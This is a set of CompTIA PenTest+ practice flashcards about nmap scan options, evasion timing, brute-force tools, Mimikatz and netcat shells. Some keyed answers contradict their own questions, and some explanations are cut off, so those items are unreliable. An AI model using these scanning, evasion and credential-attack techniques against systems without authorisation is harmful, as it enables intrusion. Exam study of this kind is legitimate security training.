CompTIA PenTest+ Practice Test Chapter 4 Penetration Testing Tools (Sybex: Panek, Crystal, Tracy) Flashcards
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a SYN port scan of this host. Which command should you use to do this?
A.nmap 192.168.1.1 -sS
B.nmap 192.168.1.1 -sT
C.nmap 192.168.1.1 -sU
D.nmap 192.168.1.1 -sA
A.nmap 192.168.1.1 -sS
Explanation:
The –sS option causes the nmap utility to conduct a SYN port scan of the specified target system.
You are conducting a white box penetration test for a client. You need to use the nmap utility on your laptop to run a scan of every host on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0). Which commands could you use to do this? (Choose two.)
A.nmap 192.168.1.0 B.nmap 192.168.1.0-255 C.nmap 192.168.1.0 –m:255.255.255.0 D.nmap 192.168.1.0/24 E.nmap 192.168.1.1-254
D.nmap 192.168.1.0/24
E.nmap 192.168.1.1-254
Explanation:
The nmap 192.168.1.0/24 command causes the nmap utility to scan every system on the subnet, from .1 to .254.
Likewise, the nmap 192.168.1.1-254 command causes the nmap utility to scan every system on the subnet, from .1 to .254.
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a SYN port scan of this host. Which commands could you use to do this? (Choose two.)
A.nmap 192.168.1.1 –sS B.nmap 192.168.1.1 C.nmap 192.168.1.1 -sV D.nmap 192.168.1.1 -O E.nmap 192.168.1.1 –T0
A.nmap 192.168.1.1 –sS
B.nmap 192.168.1.1
Explanation:
The nmap 192.168.1.1 -sS command causes the nmap utility to conduct a SYN port scan of the specified target system. Likewise, the nmap 192.168.1.1 command also causes the nmap utility to conduct a SYN port scan of the specified target system because a SYN scan is the default used if no other scan type is specified.
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to determine the operating system running on this host. Which command should you use to do this?
A.nmap 192.168.1.1 –sS
B.nmap 192.168.1.1 –sL
C.nmap 192.168.1.1 -sV
D.nmap 192.168.1.1 -O
D.nmap 192.168.1.1 -O
Explanation:
The nmap 192.168.1.1 -O command causes the nmap utility to use TCP/IP stack fingerprinting to determine the operating system installed on the remote host.
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to determine the operating system running on this host. Which command could you use to do this?
A.nmap 192.168.1.1 –A
B.nmap 192.168.1.1 –T1
C.nmap 192.168.1.1 -sT
D.nmap 192.168.1.1 -f
A.nmap 192.168.1.1 –A
Explanation:
The nmap 192.168.1.1 -A command enables OS detection, service version detection, script scanning, and traceroute to the remote host.
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a TCP connect scan of this host.
Which command should you use to do this?
A.nmap 192.168.1.1 –sL
B.nmap 192.168.1.1 –T1
C.nmap 192.168.1.1 -sT
D.nmap 192.168.1.1 -f
C.nmap 192.168.1.1 -sT
Explanation:
The nmap 192.168.1.1 -sT command causes the nmap utility to conduct a TCP connect scan of the specified target system.
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a UDP port scan of this host. Which command should you use to do this?
A.nmap 192.168.1.1 –sL
B.nmap 192.168.1.1 –U
C.nmap 192.168.1.1 -sT
D.nmap 192.168.1.1 -sU
D.nmap 192.168.1.1 -sU
Explanation:
The nmap 192.168.1.1 -sU command causes the nmap utility to conduct a UDP port scan of the specified target system.
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) without actually scanning those hosts. Which command should you use to do this?
A.nmap 192.168.1.0/24 –sL
B.nmap 192.168.1.0/24 –list
C.nmap 192.168.1.1-254 -sW
D.nmap 192.168.1.1-254 -sM
A.nmap 192.168.1.0/24 –sL
Explanation:
The nmap 192.168.1.0/24 -sL command causes the nmap utility to scan the specified range of IP addresses for hosts. It simply lists targets to scan.
You are conducting a gray box penetration test for a client. You have identified an internal host with an IP address of 192.168.1.1 as a potential target. You need to use the nmap utility on your laptop to run a TCP ACK scan of this host. Which command should you use to do this?
A.nmap 192.168.1.1 –sA
B.nmap 192.168.1.1 –T1
C.nmap 192.168.1.1 -sT
D.nmap 192.168.1.1 -ACK
A.nmap 192.168.1.1 –sA
Explanation:
The nmap 192.168.1.1 -sA command causes the nmap utility to conduct a TCP ACK scan of the specified target system.
You are conducting a white box penetration test for a client. You need to use the nmap utility on your laptop to run a scan of every host on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0), but without scanning the host with an IP address of 192.168.1.250 (which you suspect is a honeypot host). Which command should you use to do this?
A.nmap 192.168.1.1-254
B.nmap 192.168.1.0/24 –noscan 192.168.1.250
C.nmap 192.168.1.0/24 –exclude 192.168.1.250
D.nmap 192.168.1.1-254 –skip 192.168.1.250
C.nmap 192.168.1.0/24 –exclude 192.168.1.250
Explanation:
The nmap 192.168.1.0/24 –exclude 192.168.1.250 command causes the nmap utility to scan every system on the subnet from .1 to .254 but skips the host with an IP address of 192.168.1.250.
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to run a TCP ACK scan of hosts on the network with IP addresses of 192.168.1.10, 192.168.1.11, and 192.168.1.13. Which command should you use to do this?
A.nmap 192.168.1.10-13 –sA
B.nmap 192.168.1.0/24 –sA
C.nmap 192.168.1.10/24 -sA
D.nmap 192.168.1.10-13 –sT
A.nmap 192.168.1.10-13 –sA
Explanation:
The nmap 192.168.1.10-13 -sA command causes the nmap utility to conduct a TCP ACK scan of the target systems with IP addresses of 192.168.1.10, 192.168.1.11, and 192.168.1.13.
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to run a UDP scan of hosts on the network with IP addresses of 192.168.1.10, 192.168.1.11, 192.168.1.13, and 192.168.1.15. Which command should you use to do this?
A.nmap 192.168.1.10-15 –sU
B.nmap 192.168.1.0/24 –sU
C.nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 -sU
D.nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 –U
C.nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 -sU
Explanation:
Because the hosts to be scanned do not have contiguous IP addresses, you must specify each host individually. In this case, the nmap 192.168.1.10 192.168.1.11 192.168.1.12 192.168.1.13 192.168.1.15 -sU command causes the nmap utility to conduct a UDP port scan of each specified system.
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all of the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) without actually scanning any ports on those hosts. Which command should you use to do this?
A.nmap 192.168.1.0/16 –sL
B.nmap 192.168.1.1-254 -sn
C.nmap 192.168.1.1-254 -sW
D.nmap 192.168.1.0/16 -sM
B.nmap 192.168.1.1-254 -sn
Explanation:
The nmap 192.168.1.1-254 -sn command causes the nmap utility to scan the specified range of IP addresses for hosts. It lists all the hosts found without actually scanning any of their ports.
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to discover all of the hosts on the 192.168.1.0 subnet (which uses a subnet mask of 255.255.255.0) that have the Telnet port open.
Which command should you use to do this?
A.nmap 192.168.1.0/24 –s 23
B.nmap 192.168.1.0/24 –p 21
C.nmap 192.168.1.1-254 –p 21
D.nmap 192.168.1.1-254 –p 23
D.nmap 192.168.1.1-254 –p 23
Explanation:
The nmap 192.168.1.1-254 –p 23 command causes the nmap utility to scan the specified range of IP addresses for hosts with Telnet port 23 open.
You are conducting a gray box penetration test for a client. You need to use the nmap utility on your laptop to scan all of the ports on a network host with an IP address of 192.168.1.2. Which command should you use to do this?
A.nmap 192.168.1.2 -p-
B.nmap 192.168.1.2 –p all
C.nmap 192.168.1.2 –s all
D.nmap 192.168.1.2 –p 1-1024
A.nmap 192.168.1.2 -p-
Explanation:
The nmap 192.168.1.2 -p- command causes the nmap utility to scan all ports on the specified host. Be aware that the scan will take some time to complete because of the number of ports involved.
You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Filtered. What does this likely mean?
A.The Telnet service is installed but not running.
B.The Telnet service is not installed.
C.The Telnet service is not installed, and a different service is using its default port.
D.The Telnet service is installed and running, but a host firewall is blocking it.
D.The Telnet service is installed and running, but a host firewall is blocking it.
Explanation:
When nmap indicates a port is filtered, it usually means the associated service is installed and running, but a host firewall is blocking the port.
You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Open. What does this mean?
A.The Telnet service is installed but not running.
B.The Telnet service is installed, running, and accessible.
C.The Telnet service is not installed, and a different service is using its default port.
D.The Telnet service is not installed.
B.The Telnet service is installed, running, and accessible.
Explanation:
When nmap indicates a port is open, it usually means the associated service is installed, is running, and is accessible through the host firewall.
You are conducting a gray box penetration test for a client. You use the nmap utility to see whether the Telnet service is running on a Linux server you discovered. The output of the command indicates that the Telnet port state is Closed. What could this mean? (Choose two.)
A.The Telnet service is installed but not running.
B.The Telnet service is installed, running, and accessible.
C.The Telnet service is not installed, and a different service is using its default port.
D.The Telnet service is not installed.
E.The Telnet service is installed and running, but a host firewall is blocking it.
A.The Telnet service is installed but not running.
Explanation:
When nmap indicates a port is closed, it usually means either the associated service is not installed at all or it has been installed but currently isn’t running. Therefore, nothing is listening on its associated port.
A penetration tester uses the nmap utility to send a TCP SYN packet to a target host. The target host responds with a SYN ACK packet, but instead of finishing the connection, nmap sends a reset packet to the target host. Which option did the tester use with the nmap command?
A.-sS
B.-sT
C.-sU
D.-sL
A.-sS
Explanation:
The –sS option causes nmap to run a TCP SYN scan. In this scan, nmap sends a TCP SYN packet to a target host, and then the target host responds with a SYN ACK packet. However, instead of finishing the connection, nmap sends a reset packet to the target host.
Which command option causes nmap to detect services running on a target host and report the version number of any services found?
A.-sS
B.-sT
C.-sU
D.-sV
D.-sV
Explanation:
All of the options shown in this question will cause nmap to detect services running on the target host. However, only the –sV option can be used with nmap to detect the version number of those services.
Which command option will cause nmap to scan just UDP port 20 and TCP ports 21 and 22?
A.-p 20-22
B.–top-ports 1024
C.-p U:20,T:21,22
D.-p-
C.-p U:20,T:21,22
Explanation:
The -p U:20,T:21,22 command tells nmap to just scan UDP port 20 and TCP ports 21 and 22. The other options in this question will also scan these ports; however, they also scan many other unwanted ports.
As a penetration tester, you want to scan a Linux server with an IP address of 192.168.1.200 in the target network and see whether it has a web server installed and running. Which nmap commands will do this? (Choose two.)
A.nmap 192.168.1.200 –p http,https
B.nmap 192.168.1.200 –sn 80,443
C.nmap 192.168.1.200 –p 80,443
D.nmap 192.168.1.200 –T4 80,443
A.nmap 192.168.1.200 –p http,https
C.nmap 192.168.1.200 –p 80,443
Explanation:
Either the –p http,https option or the –p 80,443 option can be used with nmap to scan a host for a web server service.
As a penetration tester, you want to scan a Linux server with an IP address of 192.168.1.200 in the target network for the 1000 most popular network services to see whether they are installed and running. However, you already know this host is running the DNS service, so you want to skip this port in the scan. Which nmap command will do this?
A.nmap 192.168.1.200 –p 1-1000 –exclude-ports 53
B.nmap 192.168.1.200 –top-ports 1000 –exclude-ports 53
C.nmap 192.168.1.200 –well-known-ports –exclude-ports 53
D.nmap 192.168.1.200 –top-ports 1000
B.nmap 192.168.1.200 –top-ports 1000 –exclude-ports 53
Explanation:
The –top-ports 1000 option tells nmap to scan the default ports used by the 1,000 most popular network services. The –exclude-ports 53 option tells nmap to skip port 53 (the default port used by DNS servers) during the scan.
You have created a list of target hosts that you want to scan with nmap and saved it to a text file named /root/targets.txt. Which command should you use to run the scan using this file?
A.nmap -iR /root/targets.txt
B.nmap –file /root/targets.txt
C.nmap -iL /root/targets.txt
D.nmap -iF /root/targets.txt
C.nmap -iL /root/targets.txt
Explanation:
The -iL file_name option tells nmap to read the specified file and scan only those hosts listed in the file.
A penetration tester wants to run a port scan on all hosts on the 192.168.1.0 subnet (with a subnet mask of 255.255.255.0) without actually discovering the hosts first. Which command should she use?
A.nmap 192.168.1.0/24 -Pn
B.nmap 192.168.1.0/24 -sL
C.nmap 192.168.1.0/24 -sn
D.nmap 192.168.1.0/24 -n
A.nmap 192.168.1.0/24 -Pn
Explanation:
The -Pn option tells nmap to scan a host (or an entire subnet) without actually discovering hosts. This type of scan should be avoided during a penetration test because it takes a long time; each port on each IP address in the range is scanned, regardless of whether the IP address is valid. Because of this, it also creates a tremendous amount of traffic that may be detected by an IDS or IPS tool.
A penetration tester is using nmap to scan hosts on the target network. The client uses an aggressive IPS tool and employs an experienced IT staff that she needs to avoid. Which timing option should she use with nmap to avoid detection? (Assume that time is not an issue.)
A.-T1
B.-T3
C.-T4
D.-T5
A.-T1
Explanation:
The –T1 option tells nmap to scan in sneaky mode. In this mode, a port will be scanned once every 15 seconds. As such, this type of scan is very slow. However, the slowness also makes the scan harder to detect.
A penetration tester is using nmap to scan hosts on the target network. The client has a lax security posture and employs a relatively inexperienced IT staff. Which timing option could she consider using with nmap to speed up her scans?
A.-T1
B.-T2
C.-T3
D.-T4
D.-T4
Explanation:
The –T4 option tells nmap to scan in aggressive mode. This type of scan runs quite quickly. However, the speed also makes the scan easier to detect by IDS/IPS systems or the target’s IT staff.
A penetration tester runs an nmap scan without specifying a timing option. Which one is used by default?
A.-T1 B. -T2 C.-T3 D.-T4 E.-T0
C.-T3
Explanation:
If the nmap command is run without specifying a timing option, then the –T3 option is used by default. This tells nmap to scan in normal mode.
Which nmap timing option causes it to scan in Paranoid mode?
A.-T0 B.-T1 C.-T2 D.-T3 E.-T4
A.-T0
Explanation:
The –T0 option causes nmap to scan in paranoid mode, in which only one port is scanned on a target host every five minutes. While this mode can be used to run the stealthiest scans, it also causes them to run incredibly slowly.
Which nmap timing option causes it to scan in Insane mode? A.-T5 B.-T4 C.-T3 D.-T2 E.-T1
A.-T5
Explanation:
The –T5 option causes nmap to scan in insane mode. This is the fastest type of nmap scan. However, the speed also makes it easier to detect by IDS/IPS tools or the target’s IT staff.
Which nmap timing option causes it to scan in Polite mode?
A.-T0 B.-T1 C.-T2 D.-T3 E.-T4
C.-T2
Explanation:
The –T2 option causes nmap to scan in polite mode. This type of scan runs quite slowly. However, the slowness also makes the scan harder to detect.
Which option causes nmap to save its output to a standard text file in the file system of the host where it was run?
A.-oX
B.-oN
C.-oT
D.-oV
B.-oN
Explanation:
The –oN option causes nmap to write the output from the scan to a standard text file. You must specify a filename with this option.
Which option causes nmap to save its output to an XML-formatted text file in the file system of the host where it was run?
A.-oX
B.-oN
C.-oT
D.-oG
A.-oX
Explanation:
The –oX option causes nmap to write the output from the scan to an XML-formatted text file. You must specify a filename with this option.
Which option causes nmap to save its output to a text file that can be quickly searched using the grep command?
A.-oV
B.-oN
C.-oT
D.-oG
D.-oG
Explanation:
The –oG option causes nmap to write the output from the scan to a text file in a format that allows it to be quickly searched using the grep command. You must specify a filename with this option.
Which option causes nmap to save its output in a normal text file, in an XML-formatted text file, and in a greppable text file all at once?
A.-oX
B.-oN
C.-oA
D-oG
C.-oA
Explanation:
The –oA option causes nmap to write the output from the scan to a normal text file, in an XML-formatted text file, and in a greppable text file all at once. You must specify a base filename with this option. A different extension will be added to each of the files generated using this base filename. The normal file will have an .nmap extension, the greppable file will have a .gnmap extension, and the XML file will have an .xml extension.
Which option causes nmap to scan using tiny, fragmented packets in an attempt to fool a packet filtering firewall?
A.-f
B.-Pn
C.-n
D.-sC
A.-f
Explanation:
The –f option causes nmap to scan using tiny, fragmented packets. Sometimes these small packets can be more difficult for packet filtering firewalls to properly analyze.
Which option causes nmap to send scans from a spoofed IP address?
A.-f
B.-D
C.-n
D.-sF
B.-D
Explanation:
The –D option causes nmap to send scans from a spoofed IP address. You can specify one or more fake source IP addresses using this option.
Which option causes nmap to scan a specified number of random hosts?
A.-iL
B.-sS
C.-sR
D.-iR
D.-iR
Explanation:
The –iR option causes nmap to scan a specified number of random hosts. For example, if you wanted to scan 50 random hosts, you would use the –iR 50 option with the nmap command.
Which option causes nmap to scan a host for the 100 most commonly used IP ports, such as 20, 21, 23, 25, 53, 80, etc.?
A.-p-
B.-sV
C.-F
D.-p 100
C.-F
Explanation:
The –F option causes nmap to scan a specified number host for the 100 most commonly used IP ports. For example, this scan would include ports 20, 21, 23, 25, 53, 80, and so on. Sometimes, this is called a fast port scan.
Which nmap option causes the utility to relay connections through a proxy server?
A.–proxies
B.-S
C.-D
D.-g
A.–proxies
Explanation:
The –proxies option causes nmap to relay connections through a proxy server. You need to include the IP address of one or more proxy servers with this option.
Consider the following image: Which nmap commands could have been used to generate this output? (Choose two.)
A.nmap 10.0.0.1
B.nmap 10.0.0.1 -sS
C.nmap 10.0.0.1 -sL
D.nmap 10.0.0.1 -sn
A.nmap 10.0.0.1
B.nmap 10.0.0.1 -sS
Explanation:
In this example, the nmap utility was used to run a TCP SYN scan. Both the nmap 10.0.0.1 and nmap 10.0.0.1 –sS commands can be used to run this kind of scan.
Consider the following image: Which nmap command could have been used to generate this output?
A.nmap 10.0.0.1 -PA
B.nmap 10.0.0.1 -sT
C.nmap 10.0.0.1 -sL
D.nmap 10.0.0.1 -sn
B.nmap 10.0.0.1 -sT
Explanation:
In this example, the nmap utility was used to run a TCP connect scan. The nmap 10.0.0.1 –sT command can be used to run this kind of scan. Note that the output of the command looks almost identical to the output of a TCP SYN scan.
Consider the following image: Which nmap command could have been used to generate this output?
A.nmap 10.0.0.1
B.nmap 10.0.0.1 -sS
C.nmap 10.0.0.1 -sU
D.nmap 10.0.0.1 -sT
C.nmap 10.0.0.1 -sU
Explanation:
In this example, the nmap utility was used to run a UDP scan. The nmap 10.0.0.1 –sU command can be used to run this kind of scan. Note that the output of the command looks almost identical to the output of a TCP SYN scan; however, it lists UDP ports instead of TCP ports.
Consider the following image: Which nmap command could have been used to generate this output?
A.nmap 10.0.0.1 -sA
B.nmap 10.0.0.1 -sS
C.nmap 10.0.0.1 -sU
D.nmap 10.0.0.1 -sT
A.nmap 10.0.0.1 -sA
Explanation:
In this example, the nmap utility was used to run a TCP ACK port scan. The nmap 10.0.0.1 –sA command can be used to run this kind of scan.
Consider the following image:
Which nmap command could have been used to generate this output?
A.nmap 10.0.0.5 -v
B.nmap 10.0.0.5 -sS
C.nmap 10.0.0.5 -sU
D.nmap 10.0.0.5 -sT
A.nmap 10.0.0.5 -v
Explanation:
In this example, the nmap utility was used to run a TCP SYN scan. However, the –v option was included to increase the verboseness of the output.
Consider the following image: Which nmap command could have been used to generate this output?
A.nmap 10.0.0.5
B.nmap 10.0.0.5 -sS
C.nmap 10.0.0.5 –sU -vv
D.nmap 10.0.0.5 –sT -v
C.nmap 10.0.0.5 –sU -vv
Explanation:
In this example, the nmap utility was used to run a UDP scan. However, the –vv option was included to greatly increase the verboseness of the output.
Consider the following image: Which nmap command could have been used to generate this output?
A.nmap 10.0.0.1-10
B.nmap 10.0.0.1-10 -sL
C.nmap 10.0.0.1-10 –Pn
D.nmap 10.0.0.1-10 –PS
B.nmap 10.0.0.1-10 -sL
Explanation:
In this example, the nmap utility was used to simply list available targets. This is done by running nmap with the –sL option. This causes nmap to list hosts, but not actually scan them.
Consider the following image: Which nmap command could have been used to generate this output?
A.nmap 10.0.0.1-10
B.nmap 10.0.0.1-10 -sL
C.nmap 10.0.0.1-10 –sn
D.nmap 10.0.0.1-10 –PR
C.nmap 10.0.0.1-10 –sn
Explanation:
In this example, the nmap utility was used to discover available targets. This is done by running nmap with the –sn option. This causes nmap to discover hosts, but not actually scan any of their ports.
Consider the following image: Which nmap command could have been used to generate this output?
A.nmap 10.0.0.1-10 –p 80
B.nmap 10.0.0.1-10 -F
C.nmap 10.0.0.1-10 –sn 80
D.nmap 10.0.0.1-10 –p-
A.nmap 10.0.0.1-10 –p 80
Explanation:
In this example, the nmap utility was used to scan port 80 on each of the 10 hosts listed in the range of IP addresses. This is done by running nmap with the –p
Consider the following image: Which nmap command could have been used to generate this output?
A.nmap 10.0.0.5
B.nmap 10.0.0.5 -sS
C.nmap 10.0.0.5 –sV
D.nmap 10.0.0.5 –sT
C.nmap 10.0.0.5 –sV
Explanation:
In this example, the nmap utility was used to scan the open ports on the host listed in the command and then determine the version of the service using each of those ports. This is done by running nmap with the –sV option.
As a part of a penetration test, you need to perform reconnaissance on the target organization to passively gather information. Which tools could you use to do this? (Choose two.)
A.whois B.Metasploit Framework C.OpenVAS D.nslookup E.Nessus
A.whois
D.nslookup
Explanation:
The whois and nslookup utilities can be used to passively conduct reconnaissance on the target organization. Because they report information that is available to the general public, using these tools is highly unlikely to arouse any suspicion.
As a part of a penetration test, you need to establish an active connection to the computer systems and devices at the target organization to enumerate and fingerprint them. Which tools could you use to do this? (Choose two.)
A.whois B.nmap C.hping D.Aircrack-ng E.John the Ripper
B.nmap
C.hping
Explanation:
The nmap and hping utilities can be used to actively enumerate and fingerprint target systems.
As a part of a penetration test, you need to gather user account names and passwords from the passwd and shadow files from a Linux server. Which utilities could you use to do this? (Choose two.)
A.John the Ripper B.Cain and Abel C.Kismet D.Censys E.Recon-ng
A.John the Ripper
B.Cain and Abel
Explanation:
John the Ripper as well as Cain and Abel can be used to crack passwords from an offline database of user accounts, such as the shadow and passwd files from a Linux system.
As a part of a penetration test, you need to perform an in-depth scan of a target to identify vulnerabilities, such as missing updates or misconfigured security settings. Which utilities could you use to do this?
A.Censys B.theHarvester C.Shodan D.OWASP ZAP E.Nessus
D.OWASP ZAP
E.Nessus
Explanation:
OWASP ZAP as well as Nessus can be used to scan a target for vulnerabilities.
A penetration tester is performing a gray box test for a client. The tester decides to run a brute-force attack against a SQL database. Which utility could be used to do this?
A.John the Ripper
B.SQLmap
C.WiFite
D.Nikto
B.SQLmap
Explanation:
SQLmap can be used to brute-force crack the password for an SQL database.
A penetration tester is performing a gray box test for a client. The tester wants to try to generate a Kerberos “golden ticket” to compromise services within the target Active Directory domain. Which utility could be used to do this?
A.Mimikatz
B.John the Ripper
C.W3AF
D.ncat
A.Mimikatz
Explanation:
Mimikatz can be used to compromise Kerberos-based authentication systems, including generating “golden” and “silver” Kerberos tickets.
Which of the following utilities can be categorized as vulnerability scanners? (Choose two.)
A.Nikto B.SET C.W3AF D.Medusa E.Hydra
A.Nikto
C.W3AF
Explanation:
Both Nikto and W3AF utilities are commonly used to scan targets for vulnerabilities.
Which of the following are commonly used to perform brute-force password attacks? (Choose two.)
A.BeFF B.Drozer C.W3AF D.Medusa E.Hydra
D.Medusa
E.Hydra
Explanation:
Both Medusa and Hydra utilities can be used to conduct brute-force password attacks.
Which of the following can be used to perform brute-force password attacks? (Choose two.)
A.Empire B.Patator C.Powersploit D.Aircrack-ng E.APK Studio
B.Patator
D.Aircrack-ng
Explanation:
Both Patator and Aircrack-ng utilities can be used to conduct brute-force password attacks. Patator can be used to compromise a variety of network services, such as FTP, SNMP, and SSH servers. Aircrack-ng is used to brute-force wireless networks.
Which of the following penetration tools are based on Windows PowerShell? (Choose two.)
A.BeEF B.SET C.Empire D.PowerSploit E.Hopper
C.Empire
D.PowerSploit
Explanation:
Both Empire and PowerSploit utilities are based on Windows PowerShell. Essentially, they are a collection of
Which utility is used to conduct social engineering exploits?
A.Responder B.SET C.APKX D.Immunity debugger E.Hopper
B.SET
Explanation:
The Social Engineer Toolkit (SET) is an open source penetration testing utility designed to conduct social engineering exploits.
Which penetration testing utility is focused on exploiting web browsers?
A.BeEF B.foremost C.FTK D.EnCase E.Tableau
A.BeEF
Explanation:
The Browser Exploitation Framework (BeEF) is a penetration testing utility designed to exploit weaknesses in web browsers using client-side attacks.
As a part of a penetration test, you want to access a shell session on a target Windows server. Which utility could be used to do this?
A.Ollydbg
B.GDB
C.WinDBG
D.ncat
D.ncat
Explanation:
The ncat utility can be used to read, write, redirect, and encrypt network data. For example, it can be used to establish shell sessions with a variety of servers, including Windows, Linux, and UNIX systems.
As a part of a penetration test, you want to reverse compile the executable for an in-house developed application used by the target organization. Which of the following tools can be used to do this? (Choose two.)
A.IDA B.Hopper C.route D.Tableau E.FTK
A.IDA
B.Hopper
Explanation:
Both IDA and Hopper can be used for decompilation. During this process, an executable file is reverse-compiled into source code, allowing you to examine it for vulnerabilities.
Which of the following tools are used to collect and analyze evidence from a digital crime scene? (Choose two.)
A.APKX B.Peach C.foremost D.AFL E.FTK
C.foremost
E.FTK
Explanation:
Both foremost and FTK are forensic tools. They are used to gather and analyze digital evidence from a cyber crime scene.
Which of the following tools can be used by a system administrator to ensure the network is in configuration compliance?
A.Nikto
B.Tableau
C.AFL
D.IDA Pro
A.Nikto
Explanation:
Although Nikto is usually considered a vulnerability scanner used by penetration testers, it can also be used by system administrators to verify configuration compliance within their networks, specifically with the configuration of their web servers.
During a black box penetration test, you need to use evasion to obscure your presence from system administrators in the target organization. Which tool could you use to do this?
A.YASCA
B.SonarQube
C.SAST
D.proxychains
D.proxychains
Explanation:
The proxychains tool allows you to perform penetration test tasks against a target organization and make the network traffic generated look like it came from an intermediary proxy system.
Which of the following tools can be used to debug or decompile an Android executable? (Choose two.)
A.APK Studio B.Olydbg C.Immunity debugger D.APKX E.GDB
A.APK Studio
D.APKX
Explanation:
Both APK Studio and APKX can be used to debug or even decompile an Android executable.
Which of the following tools can be used as a part of software assurance processes to perform fuzz testing on an application? (Choose two.)
A.AFL B.Olydbg C.Immunity debugger D.Peach E.GDB
A.AFL
D.Peach
Explanation:
Both AFL and Peach can be used to perform fuzzing on an application as part of software assurance.
Which of the following tools can be used as a part of software assurance processes to perform SAST and DAST testing? (Choose two.)
A.Findsecbugs B.YASCA C.Metasploit D.theHarvester E.Recon-ng
A.Findsecbugs
B.YASCA
Explanation:
Findsecbugs and Yet Another Source Code Analyzer (YASCA) can be used to perform static application security testing (SAST) or dynamic application security testing (DAST) as part of software assurance.
As a penetration tester, you want to improve your password cracking speed by building a specialized system with multiple video boards installed. Which tool can take advantage of multiple GPUs for password cracking?
A.proxychains
B.John the Ripper
C.hashcat
D.theHarvester
C.hashcat
Explanation:
The hashcat utility can be configured to use GPUs instead of CPUs to perform password cracking operations. This can dramatically speed up the process as GPUs can perform this task much faster than standard CPUs can.
During a penetration test, the system administrator checks the log of the Linux server and notices thousands of unsuccessful login attempts. Which tool could the penetration tester be using? (Choose two.)
A.Hydra B.YASCA C.nmap D.Tableau E.Medusa
A.Hydra
E.Medusa
Explanation:
The many unsuccessful login attempts is a sure sign that the penetration tester is using a brute-force password cracking tool to gain access to the system. The Hydra and Medusa utilities are both capable of running a brute-force attack.
Consider the following image:
Which penetration testing tool was used to generate this output?
A.Maltego
B.Medusa
C.netcat
D.Metasploit
B.Medusa
Explanation:
This output was created by the Medusa utility. Medusa is a brute-force password cracking tool that sends one password after another to a given user account (administrator, in this case) in hopes of finding the right one.
While performing a black box penetration test, the tester wants to crawl the target organization’s website and gather key words that may possibly be used as passwords by employees and save them in a list. The tester will then run a brute-force password utility using that list in an attempt to gain access. Which utility should be used to create the possible password file?
A.hashcat
B.CeWL
C.netcat
D.Hydra
B.CeWL
Explanation:
The CeWL utility can be configured to crawl the target organization’s website and gather keywords from the site that could possibly be used as passwords by employees and then save them in a list. The list can then be used to run a brute-force password attack.
Which of the following is a brute-force utility that can be used by penetration testers to discover directories and files on a web server?
A.ncat
B.Powersploit
C.FOCA
D.Dirbuster
D.Dirbuster
Explanation:
The Dirbuster utility is a brute-force utility that can be used by penetration testers to discover directories and files on a web server or an application server, including hidden files or directories.
Consider the following image: Which credential testing tool was used to generate this output?
A.John the Ripper
B.Hydra
C.theHarvester
D.Dirbuster
A.John the Ripper
Explanation:
This output was created by John the Ripper. This credential testing tool is a brute-force password cracking utility. In this example, the root user’s password (toor) has been discovered.
Consider the following image:
Which OSINT tool was used to generate this output?
A.whois
B.Foca
C.Maltego
D.Censys
A.whois
Explanation:
This output was created by the whois utility. This OSINT tool is used to gather public information about the target organization’s domain.
As a part of a black box penetration test, you’ve discovered that the target organization’s wireless network signal is emanating out into the parking lot and across the street. You want to access the internal network using this wireless network radio signal. However, the wireless network is encrypted. Which wireless compromise tools could you use to do this? (Choose two.)
A.searchsploit B.netcat C.OWASP ZAP D.WiFite E.Kismet
D.WiFite
E.Kismet
Explanation:
You could use either Kismet or WiFite to try to break the target organization’s wireless network. You could also use Aircrack-ng to accomplish this.
During a gray box penetration test, the tester needs to proxy connections between the target organization’s web application server and client systems running web browsers. Which web proxy penetration testing tools could the tester use to do this? (Choose two.)
A.searchsploit B.Burp Suite C.OWASP ZAP D.Impacket E.Empire
B.Burp Suite
C.OWASP ZAP
Explanation:
You could use either Burp Suite or OWASP ZAP. Both of these tools could be used to intercept network traffic flowing between users running a web browser and the target organization’s web application server. By proxying a connection, the penetration tester can read the contents of the intercepted traffic.
During a gray box penetration test, the tester wants to be able to set up a reverse shell exploit where a compromised system on the target network “calls home” to a listener set up on the tester’s laptop to enable the tester to remote control the compromised system. Which remote access tool could be used to do this?
A.netcat
B.Responder
C.Impacket
D.BeEF
A.netcat
Explanation:
The netcat utility could be used to set up a reverse shell exploit that allows the tester to remotely control the compromised system.
Which remote access tool was created by the organization that developed nmap as an updated version of the netcat utility that supports encrypted data tunnels?
A.Metasploit Framework
B.SET
C.hping
D.ncat
D.ncat
Explanation:
The ncat utility is an updated and improved version of the older netcat utility.
During a gray box penetration test, the tester wants to be able to set up a bind shell exploit where a listener is set up on a compromised system on the target. Which remote access tools could be used to do this? (CHOOSE TWO MF)
A.ncat B.netcat C.Powersploit D.DAST E.SAST
A.ncat
B.netcat
Explanation:
Either the ncat or netcat remote access tool could be used to set up a bind shell exploit.
